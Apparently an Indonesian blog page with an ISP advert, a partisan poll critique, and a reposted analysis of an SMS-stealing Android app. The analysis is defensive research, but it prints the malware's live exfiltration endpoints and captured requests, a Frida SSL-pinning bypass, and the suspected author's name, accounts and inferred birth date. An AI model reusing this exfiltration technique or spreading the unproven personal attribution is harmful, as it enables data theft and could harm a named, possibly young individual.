BREAKING NEWS
Loading...

Iklan

Arizal & Nadia

Alhamdulillah, akhirnya kutemukan dirimu wahai belahan jiwaku..

Era Digital

Mari songsong era digital dengan penuh semangat dan percaya diri.

Hidup itu indah

Hidup adalah anugerah.

Karya

Terus belajar dan berkarya.

RIZALmedia

Disinilah semua ide dan gagasan saya persembahkan.

Kepanjen Idol

Sebuah wadah yang saya persembahkan untuk mendukung generasi muda kita.

Komunitas Blogger Indonesia

Sebuah komunitas yang saya dirikan dan persembahkan untuk kawan-kawan para blogger dari seluruh Indonesia.

Radio Kepanjen FM

Media radio yang pernah saya dirikan untuk misi hiburan dan pendidikan.

Tentang Arizal

Wawasan

Belajar Blog

Belajar Desain Grafis

Belajar Multimedia

RIZALmedia

Software

Belajar Media Sosial

Film

Hiburan

Pasang IndiHome Online untuk wilayah Seluruh Indonesia

 


Buat Anda yang ingin mendapatkan akses internet wifi super cepat tanpa gangguan untuk di rumah pribadi atau di berbagai tempat usaha seperti cafe, warung kopi, warung makan, restoran, counter hp, rental komputer, atau berbagai jenis kantor atau tempat usaha lainnya, memang tepat bila menggunakan layanan internet kabel fiber optic INDIHOME.

Berikut saya sampaikan Daftar Harga IndiHome dan penjelasan serta kontak nomor HP bila ingin pasang di area Seluruh Indonesia.

Testimoni :
"Saya sudah merasakan sendiri luar biasanya indihome saya pakai di rumah dan tempat usaha saya, betul-betul tidak ada gangguan, bila Anda daftar dan ditangani oleh orang yang tepat. Nah, ingin pasang Indihome di wilayah seluruh Indonesia, hubungi Mas Arizal Firmansyah".

Pasang Indihome area Seluruh Indonesia :
WA: 085 1090 69 001 (Arizal Firmansyah)

DAFTAR HARGA PASANG WIFI INDIHOME :

Pilih salah satu Paket berikut ini beserta kecepatan (speed) yang Anda inginkan :

PROMO INDIHOME TAHUN 2022-2023 :

A. 30Mbps 1P Internet  
Paket IndiHome New Perangkat Mandiri
(Rp 255.000 + PPN 11% Rp 28.050 per bulan)

B. 40Mbps 1P Internet   
Paket Jitu
(Rp 310.000 + PPN 11% Rp 34.100 per bulan)

C. 50Mbps 1P Internet   
Paket IndiHome New Perangkat Mandiri
(Rp 320.000 + PPN 11% Rp 35.200 per bulan)

dan masih banyak paket lainnya yang bisa dipilih sendiri.

Silahkan pilih salah satu paket di atas ini sesuai daftar harga Promo tahun 2022-2023 yang terbaru untuk Pemasangan Wifi IndiHome.

Bila Anda berminat untuk pasang, langsung saja sampaikan data diri Anda via formulir berikut ini, buka : bit.ly/pasangindihomeindonesia 

Bila membutuhkan bantuan silahkan WhatsApp di : 085-1090-69-001

Untuk pemasangan jaringan Wifi IndiHome ada beberapa biaya-biaya berikut ini :

- Biaya Registrasi (Pendaftaran Pemasangan Baru) : Rp 150.000 ditagihkan pada akhir bulan pertama
- Tarif Bulanan ditambah PPN 11% dari tarif tertera.
- Deposit / Uang Jaminan (UJ) dibayar di awal pemasangan (akan ada SMS Resmi dari Telkom Pusat) senilai tarif bulanan paket yang dikehendaki (Tanpa PPN). Deposit akan dikembalikan setelah 1 tahun masa pemakaian.
- Deposit / Uang Jaminan (UJ) wajib dibayarkan paling lama 7 x 24 jam setelah Telkom mengirimkan notifikasi / SMS pembayaran. 
- Transfer pembayaran bisa di ATM / internet banking / Indomaret / Alfamart.
- Perlu diingat, akan ada denda senilai Rp 1.500.000 apabila tidak membayar deposit paling lama 7 x 24 jam setelah notifikasi / SMS pembayaran diterima.
- Perlu diingat, kontrak berlangganan IndiHome paling singkat selama 1 tahun (12 bulan). Akan ada denda senilai Rp 1.000.000 apabila berhenti berlangganan sebelum 1 tahun.


Bagi yang masih bingung, berapa sih biaya pasang awal saya?

A. 30Mbps 1P Internet Paket IndiHome New Perangkat Mandiri
  • Bayar Deposit = Rp 255.000 (transfer pembayaran bisa di ATM / internet banking / Indomaret / Alfamart setelah mendapatkan notifikasi / SMS dari Telkom paling lambat 7 x 24 jam)
  • Bayar tagihan pertama bulan depannya = Rp 255.000 + PPN Rp 28.050 + Rp 150.000
  • Bayar tagihan selanjutnya dan seterusnya = Rp 255.000 + PPN Rp 28.050
B. 40Mbps 1P Internet Paket Jitu
  • Bayar Deposit = Rp 310.000 (transfer pembayaran bisa di ATM / internet banking / Indomaret / Alfamart setelah mendapatkan notifikasi / SMS dari Telkom paling lambat 7 x 24 jam)
  • Bayar tagihan pertama bulan depannya = Rp 310.000 + PPN Rp 34.100 + Rp 150.000
  • Bayar tagihan selanjutnya dan seterusnya = Rp 310.000 + PPN Rp 34.100
C. 50Mbps 1P Internet Paket IndiHome New Perangkat Mandiri
  • Bayar Deposit = Rp 320.000 (transfer pembayaran bisa di ATM / internet banking / Indomaret / Alfamart setelah mendapatkan notifikasi / SMS dari Telkom paling lambat 7 x 24 jam)
  • Bayar tagihan pertama bulan depannya = Rp 320.000 + PPN Rp 35.200 + Rp 150.000
  • Bayar tagihan selanjutnya dan seterusnya = Rp 320.000 + PPN Rp 35.200

Bagi yang bertanya-tanya, Apakah layanan IndiHome ini Unlimited? Jawabannya IYA UNLIMITED (tidak akan terputus sampai akhir masa pembayaran), namun ada pembatasan kecepatan yang dinamakan FUP agar tidak terjadi penjualan kembali yang berlebihan. Pelajari apa itu FUP baca di sini...

Pasang Indihome area Seluruh Indonesia :
WA : 085 1090 69 001 (Arizal Firmansyah)

Bila Anda berminat untuk pasang, langsung saja sampaikan data diri Anda via formulir berikut ini, buka : bit.ly/pasangindihomeindonesia

Bila membutuhkan bantuan silahkan WhatsApp di : 085-1090-69-001

Awas HOAX!
Ada banyak beredar informasi IndiHome dengan harga lebih murah, patut berhati-hati, pendaftaran dan tarif IndiHome resmi ada pada halaman : bit.ly/pasangindihomeindonesia 

Simpan dulu Nomor WA kami, siapa tahu akan pasang di waktu mendatang : 
085-1090-69-001

Hati-hati, Ada Lembaga Survey yang "pura-pura" Netral demi Angkat Suara Anies

Hari ini, Kamis, 15 Desember 2022, beredar flyer/gambar survey di beberapa grup WA. Berikut adalah flyer yang beredar tersebut:


Kalau kita lihat sekilas sih, nampak tidak ada yang aneh dari flyer survey 3 bakal capres di atas. 

Namun, yang membuat saya heran, berbeda dengan kenyataan di lapangan dan suara rakyat di medsos, pendukung Ganjar Pranowo yang selalu unggul mayoritas di berbagai daerah, bahkan di provinsi yang disebutkan menurut pengamatan saya masih jauh lebih unggul Ganjar, eh ini malah dibuat kalah dengan suara pendukung Anies.

Setelah saya telusuri, ada yang aneh dari lembaga survey dan situs yang membuat flyer ini. Kenapa saya bilang demikian? Coba baca artikel kompas ini. Di artikel tersebut, disampaikan oleh pihak lembaga survey yang membuat survey bakal capres di atas yakni, Anies dipilih pemilihnya karena pintar, lalu Ganjar merakyat, dan Prabowo tegas.

Dari sini sudah paham kan? Kalau lembaga survey ingin menggiring pembaca, bahwa sosok Anies lebih pintar dari Ganjar maupun Prabowo. Kita mungkin tahu, selama menjadi Gubernur DKI Jakarta, Anies sering dinilai kurang cermat dalam mengambil kebijakan. Saat ini publik lebih sadar, bahwa masih lebih baik kinerja Plt. Gubernur DKI Jakarta saat ini, Heru. 

Bila Anies dinilai pintar, entah pintar dalam hal apa, belum jelas saya kira (kalau pintar dalam merangkai kata mungkin sih iya, hehe). Coba saja bandingkan dengan prestasi Ganjar di bawah ini, apakah prestasi Anies telah melampauinya?


Yang kedua, situs yang memuat adalah situs dengan rangking pembaca yang masih jauh dibawah situs mainsream (sebut saja kompas, detik, dll). Situs yang memuat survey ini masih berada di ranking alexa 20.000. Jadi, sebagai orang media, saya paham, kalau nilai kerjasama publikasi survey ini masih lebih murah dibanding situs mainstream sebut saja kompas dengan rangking alexa di posisi 218.

Dengan opini saya ini, semoga semua lebih paham, bahwa mendekati tahun politik di 2024, makin akan ada banyak survey dari lembaga survey yang pura-pura netral, bahkan ada banyak yang jelas abal-abal.

Lalu, cara mengetahui kredibilitas sebuah survey bagaimana? Pertama, telusuri rekam jejak lembaga surveynya, kedua, simak juga metode pengambilan suaranya, dan ketiga, berapa ranking alexa situs yang mengulasnya.

Semoga kita tidak terjebak dengan survey pura-pura netral ya gaes..

Bismillah, Arizal Firmansyah dirikan Yayasan Indonesia Digital Merdeka



Bismillah! Merdeka!, Senin, 12-12-2022, telah resmi didirikan Yayasan Indonesia Digital Merdeka, sebuah yayasan yang bergerak dibidang pendidikan digital dan sosial.

Yayasan Indonesia Digital Merdeka (IDM) didirikan oleh Arizal Firmansyah, seorang wirausahawan dan pengajar kursus komputer di RIZALmedia.

Berlokasi di Jl. KH. Ahmad Dahlan No. 60 Gang Kasuari RT.001 RW.004 Kauman, Kel. Kepanjen, Kec. Kepanjen, Kab. Malang, Jawa Timur, Indonesia, yayasan ini nantinya akan menaungi perjuangan pendidikan seperti kursus komputer dan juga semua komunitas digital yang telah didirikan sebelumnya oleh Arizal Firmansyah.

Arizal Firmansyah, Pendiri dan Pembina Yayasan Indonesia Digital Merdeka.

"Dengan dinaungi Yayasan Indonesia Digital Merdeka, saya harap semua perjuangan kami di bidang pendidikan digital dan sosial akan lebih terwadahi dan diketahui dengan jelas oleh pemerintah," harap Arizal Firmansyah.

Yayasan Indonesia Digital Merdeka terdaftar di Kemenkumham dengan nomor AHU-0025287.AH.01.04.Tahun 2022 tertanggal 12 Desember 2022.

"Sengaja saya dirikan di tanggal cantik, tanggal 12 bulan 12, ini adalah angka kembar tertinggi setiap tahunnya, maka saya harap akan menjadi filosofi yayasan ini akan berkembang dan bermanfaat begitu tinggi bagi masyarakat, khususnya bagi masyarakat sekitar, umumnya untuk Indonesia, Amin" ujar Arizal Firmansyah.

Kupas Tuntas Aplikasi Hacker "LIHAT Foto Paket.apk"

Belakangan ini terjadi bentuk pencurian data & pencurian uang di ATM dengan modus menerima pesan lewat aplikasi “WhatsApp Messenger” modusnya adalah korban dikirim sebuah pesan tentang pemesanan sebuah paket seperti gambar di bawah ini


Sumber gambar

Pada kasus yang lain percakapannya tidak seperti gambar di atas dan mungkin memiliki aplikasi yang berbeda juga seperti berita pada tautan berikut ini. Inti dari bentuk kejahatan digital ini adalah, korbannya di”hipnotis” dengan bentuk manipulasi psikologi “Apa benar ada sebuah paket?” maka si korban akan merasa “ah tidak” lalu korban akan terhipnotis sekali lagi untuk membuka sebuah file “LIHAT Foto Paket” tersebut, dalam kasus di atas untungnya si korban sadar dan langsung melakukan blokir ke nomor tersebut, tapi dalam kasus lain jika sudah terinstall dan diizinkan semua permission yang dibutuhkan oleh si aplikasi dan voila, semua “data” SMS akan tercuri dan dari sinilah kejahatan berikutnya berlanjut, **let me explain** in practical way.

Saya mendapatkan aplikasi “LIHAT Foto Paket.” di atas dari salah satu teman baik saya yaitu mas Bilal. Saya sendiri tidak dapat menduga apakah aplikasi ini otentik dengan aplikasi yang sudah beredar untuk melakukan kejahatan, tapi YANG BISA SAYA PASTIKAN APLIKASI YANG SAYA TELITI INI JUGA SAMA JAHATNYA DENGAN MODUS KEJAHATAN YANG SEDANG BEREDAR SAYA BISA MEMBUKTIKAN ITU.

Informasi dasar mengenai aplikasi yang saya teliti ini dapat dilihat seperti gambar di bawah ini



Ukuran dari aplikasi tersebut adalah 5.5 mega, cukup besar bagi saya hanya untuk melakukan pencurian data. Mari lakukan decompile aplikasi ini, isi dari AndroidManifest.xml adalah sebagai berikut ini



****Permission**** yang dibutuhkan adalahTerima SMS
Akses Internet
Mengirim SMS

Dengan dasar nama aplikasi com.rndytech.smstest dengan package nama class-nya adalah package com.example.myapplication; menarik untuk melihat MainActivity class untuk memahami apa yang dilakukan oleh aplikasi ini



Singkatnya aplikasi ini hanya WebView aplikasi yang melakukan loading terhadap web JET (https://jet.co.id/track) lalu sisanya adalah melakukan pengecekan permission untuk ****READ SMS****, dari bagian kode di atas saja sudah sangat SUS karena jika memang ini aplikasi hanya untuk pengecekan JET RESI, kenapa butuh permission SMS? tapi tak apa, mari melihat lebih dalam di potongan kode yang lain



Dari sini kejahatan mulai terjadi, saat melakukan ****permission check**** ada potongan kode yang mengarahkan untuk hit ke REST API (https://randiramli.com) dengan isi detail dari **device** yang kita pakai, jahat ya. Untuk apa kebutuhan developer aplikasi mengetahui detail device kita? oh mungkin bagian dari pengembangan berkelanjutan? menarik. Mari lihat sekali lagi isi class yang ada dalam aplikasi ini



Ada class yang cukup menarik **ReceiveSMS** dengan isi seperti di bawah ini



Dan kejahatan terjadi pada kode di atas, sekali lagi kode di atas akan melakukan hit ke (https://randiramli.com) kali ini adalah saat handphone mendapatkan sebuah SMS, aplikasi ini akan mengirimkan juga ke REST API di atas pada parameter index.php?text= dari sini penulis dapat menyimpulkan bahwaTidak peduli aplikasi ini otentik dengan yang beredar atau tidak tapi aplikasi ini juga melakukan pencurian data SMS para pengguna yang menginstall ini.
Aplikasi ini dapat menjadi titik awal pencurian data sampai pencurian saldo pada aplikasi M-Banking

Bagaimana penulis dapat melakukan kesimpulan di atas? pertama tidak ada kepentingan bagi para **developer** mengetahui isi dari SMS dari pengguna yang melakukan instalasi aplikasi ini, lalu bagaimana bisa aplikasi ini dapat menjadi titik awal tercurinya saldo M-Banking dari para pengguna yang menginstall biarkan saya melakukan perandaian dengan urutan berikut iniSaya adalah calon korban menggunakan M-Banking yang sama dengan nomor WA saya
Saya terkenal ****flexing**** kekayaan di sosial media, maka asumsi saya mempunyai saldo di M-Banking saya adalah di atas 100 juta (amiiinn)
Seorang penjahat akan tergoda untuk melakukan pencurian dengan mendapatkan isi dari handphone korban.
Penjahat membuat aplikasi yang sedang dibahas dengan target mencuri data SMS? kenapa? karena bank butuh OTP yang akan dikirimkan lewat SMS.
Tapi kan gak selalu korban melakukan transaksi SMS yang butuh OTP, pasti expired dong? benar. Tapi bagaimana kalau si Penjahat yang memulai semuanya dengan **Login,Transfer** dari device pribadinya? karena sudah dapat akses OTP dari handphonemu.

Dari point-point di atas lah kemungkinan yang dapat terjadi dari penggunaan aplikasi di atas. Pesan moral yang dapat disampaikan di awal ini adalah JANGAN PERNAH INSTALL APLIKASI SELAIN DARI PLAYSTORE, itu langkah AWAL, langkah agak keras adalah INSTALL aplikasi yang umum saja, di bagian berikut ini penulis akan melakukan pembuktian sangat TEKNIS bagi pembaca di luar rumpun Informatika bisa berhenti sampai di sini, tapi kalau penasaran juga boleh.

Persiapan VM Device, penulis menggunakan device dengan informasi berikut ini dengan Hypervisor Android Studio



Penulis menggunakan Android 9.0 dengan arch X86_64 dengan API 28, tampilannya seperti berikut ini (jelek banget emang asem lah).



Lakukan install aplikasi dengan menggunakan adb seperti pada gambar di bawah ini



Aplikasi sukses diinstall, namun pada halaman menu aplikasi android tidak ada 😃 waw, menarik.



Aplikasi yang saya install lewat adb tidak ada 😃 hal-hal yang saya sensor adalah aplikasi NDA yang berhubungan dengan pekerjaan, namun menariknya aplikasi terinstall terlist di daftar aplikasi terinstall milik android 😃



Aplikasi terinstall dan terdaftar di system android



Menarik bukan? menurut asumsi penulis aplikasi tidak terdaftar di menu awal mungkin karena hal yang kurang compatible atau memang didesign seperti ini. Lalu? cara membuka aplikasi ini bagaimana? kita dapat melakukan force open lewat adb shell pertama kita cari dulu nama package yang ada, daftarnya dapat dilihat di /data/data



Nama packagenya adalah com.rndytech.smstest dari sini kita dapat melakukan **force open** dengan ****commands****am start -n com.rndytech.smstest/com.example.myapplication.MainActivity


dengan formatam start -n com.example.example/com.package.com.NAMACLASSS


dan akan terbuka dengan tampilan seperti berikut ini



Sesuai dugaan, aplikasi akan meminta **permission** untuk akses ke SMS, setelah di allow akan membuka aplikasinya seperti berikut ini



Terlihat normal, kan? tapi tidak. Harusnya di belakang layar akan melakukan hit ke REST API, tapi bagaimana bisa membuktikannya? Kita arahkan proxy AVD ke BurpSuite kita.



Dan setelah dibuka, aplikasi tidak mengerluarkan tampilan apapun asumsi penulis adalah karena ****Failed Handshake,**** karena secara stuktur coding pada aplikasi, memang ada SSL Pinning menggunakan okhttp3.



Kita bisa melakukan bypass SSL Pinning, karena tergolong mudah dan umum, bahkan saat menggunakan commandfrida-ps -Uai


Aplikasinya pun tidak tersedia



Tapi tak apa, kita sudah mengetahui nama package-nya kita bisa buka paksa denggan menggunakan **script** frida **bypass ssl pinning**


Dan benar saja, aplikasi dapat ter-records **hit**-nya pada BurpSuite seperti berikut ini, benar saja webview dibuka dan pertama kali adalah membuka website Jet.co.id sebagai tampilan awal.



Sejauh aplikasi hanya dibuka, hanya ada request ke domain



Domain ****trust public**** yang mengekor pada website jet.co.id, lalu di mana letak pencurian datanya? mari sekali lagi melihat bagaimana proses pengiriman data ke ****REST API**** milik pemilik web/domain.



Pada bagian potongan kode di atas, hit akan dilakukan jika aplikasi TIDAK DIBERIKAN PERMISSION, maka mari hilangkan permissionya.





Dan benar saja, aplikasi akan mulai melakukan hit ke rest api dengan endpoint

https://[randiramli.com](http://randiramli.com/)/hide/satu/copyright.php?text=
https://[randiramli.com](http://randiramli.com/)/hide/satu/install.php?text=

Dengan **device id** milik kita, isi dari data device id penulis adalahbatas ID : PSR1.180720.012 batas User : android-build batas Product : sdk_phone_x86_64 batas Brand : Android batas Device : generic_x86_64 batas Board : goldfish_x86_64 batas BOOTLOADER : unknown batas DISPLAY : sdk_phone_x86_64-userdebug 9 PSR1.180720.012 4923214 test-keys batas FINGERPRINT : Android/sdk_phone_x86_64/generic_x86_64:9/PSR1.180720.012/4923214:userdebug/test-keys batas HARDWARE : ranchu batas HOST : abfarm108 batas MANUFACTURER : unknown batas MODEL : Android SDK built for x86_64 batas TAGS : test-keysbatas TYPE : userdebug batas Product : 1533059510000


Saya tidak masalah melakukan expose data ini karena ini data dari VM saya, halo pembuat aplikasi, tandai! ini data diri saya.

Lalu, selanjutnya untuk melakukan trigger potongan kode di bawah ini



Kita harus mendapatkan sebuah SMS, untungnya kita memang dapat menerima sebuah SMS dari simulasi emulator ini, caranya adalah denganadb emu sms send "123" "Halo Penipu, aplikasimu sudah tercrack"


Akan mendapatkan notifikasi SMS seperti di bawah ini



Benar saja, saat ada SMS masuk, aplikasi akan langsung mengirimkan hit ke REST API seperti record yang saya dapatkan di burpsuite ini



isi dari requestnya adalahGET /hide/satu/index.php?text=123,%20Pesan%20:%20Halo%20Penipu,%20aplikasimu%20sudah%20tercrack HTTP/2 Host: randiramli.com Accept-Encoding: gzip, deflate User-Agent: okhttp/4.9.0


dan

GET /hide/satu/enam%20php?text=123,%20Pesan%20:%20Halo%20Penipu,%20aplikasimu%20sudah%20tercrack HTTP/2 Host: randiramli.com Accept-Encoding: gzip, deflate User-Agent: okhttp/4.9.0


Benar saja yang ke-2 hitnya akan 404, karena dia typo menuliskan endpointnya, data-data yang dikirimkan adalah123, Pesan : Halo Penipu, aplikasimu sudah tercrack


123 adalah nomor pengirim, isi dari pesan kita akan berada setelah ***prefix Pesan :* dari ini sudah dapat dibuktikan bahwa DATA KITA DIKIRIMKAN KE ENDPOINT MILIK PEMBUAT APLIKASI. Pembuktian sekali lagi



Dan memang akan dikirimkan ke REST API, lagi.GET /hide/satu/index.php?text=Penipu,%20Pesan%20:%20Halo%20Penipu%20PENIPUUUUUU HTTP/2 Host: randiramli.com Accept-Encoding: gzip, deflate User-Agent: okhttp/4.9.0


Lalu ada satu potongan code lagi di class ****SendSMS**** yang belum dapat disimulasikan, kode di bawah ini akan melakukan pengiriman SMS pada bagian kode berikut ini

SmsManager mysmsmanager = SmsManager.getDefault(); mysmsmanager.sendTextMessage(kata2, null, kata3, null, null);


Mengacu pada dokumentasi milik android



Potongan kode di atas harusnya untuk mengirimkan sebuah SMS, namun belum bisa dibuktikan oleh penulis mungkin dikarenakan device yang digunakan penulis adalah sebuah VM, sebagai tambahan berikut ini adalah isi dari local storage android dari aplikasi di atas



Sekali lagi, APLIKASI INI TERBUKTI MELAKUKAN PENCURIAN DATA terlepas dari otentik atau tidak dengan aplikasi yang beredar, MENURUT PENULIS aplikasi ini sudah melanggar kaidah-kaidah privasi antara pengembang dan pengguna aplikasi. Mari, sekali lagi penulis akan melakukan tracking lebih jauh terhadap informasi-informasi yang sudah tersedia mulai dari domainrandiramli.com

Memiliki ip address





Ternyata menggunakan cloudflare 🙂 lalu, bagaimana kalau websitenya dibuka?



Akan mengeluarkan umpatan seperti di atas, lalu penulis mendapatkan beberapa path yang terbuka pada website[10:16:27] 200 - 3KB - /api/ [10:16:59] 200 - 13B - /index.php/login/ [10:16:59] 200 - 13B - /index.php [10:17:39] 200 - 0B - /test/


pada path /api terdapat tampilan seperti berikut ini



Bisa diasumsikan dari inisial “RNDY” bisa dibaca Randi atau Rendy atau Randy seperti nama domainnya, penulis mendapatkan mapping alur domain dan subdomainnya seperti gambar di bawah ini



Dengan detail seperti berikut ini



Ada banyak subdomain terdaftar, namun yang menarik adalah tampilan dari subdomain [kumpulanscript.randiramli.com](http://kumpulanscript.randiramli.com)



Sepertinya, domain ini dibeli melalui provider DomainNesia mari kita check menggunakan [who.is](http://who.is)



Domainnya dibeli pada tahun lalu di bulan Desember tanggal 30, dekat-dekat dengan tahun baru dan habis pada tahun ini di bulan ini juga, informasi detail yang lainnya adalah



Valid, pembeli dan pemiliknya bernama Randi Ramli dengan nomor telfon dan email yang mirip dengan namanya, penulis melakukan pengecekan pada nomor yang tertera pada domain tersebut dan mendapatkan informasi yang mirip dengan nama tersebut



Lalu



Lalu



Nama-nama dari nomor tersebut sangat otentik dan identik dengan hal-hal yang berbau dengan teknologi dan coding. Penulis mendapatkan sebuah path yang ada di website dengan tampilan seperti berikut ini



Penulis lalu mendapatkan sebuah informasi pribadi dari pemilik web/domain dengan menemukan sebuah instagram pemilik website ini



https://www.instagram.com/rndyinhere/

Dengan tampilan post yang penulis asumsikan adalah tahun lahir dari si pemilik akun



Asumsi penulis, pemilik web/domain bernama Randi Ramli memiliki tanggal lahir 30 Januari 2004 (18 tahun). Orang-orang terkait yang diikuti oleh pemilik web/domain adalah sebagai berikut ini







Penulis melakukan pencarian lagi dengan menemukan domain yang mirip dengan beda TLD saja yaitu https://www.randiramli.my.id/ ****dan memiliki tampilan seperti berikut ini



Dan menemukan akun telegram



Terima kasih sudah membaca, semua hal-hal yang ada di tulisan ini didapatkan secara umum melalui informasi yang didapatkan dari GoogleFU. Semoga menjadi pertimbangan kesadaran lebih untuk tidak gampang melakukan instalasi terhadap sebuah aplikasi. Mohon maaf jika ada kesalahan yang tertulis, dari hati yang tulus paling dalam.
https://nikkoenggaliano.my.id/read.php?id=7

Tag Terpopuler


Top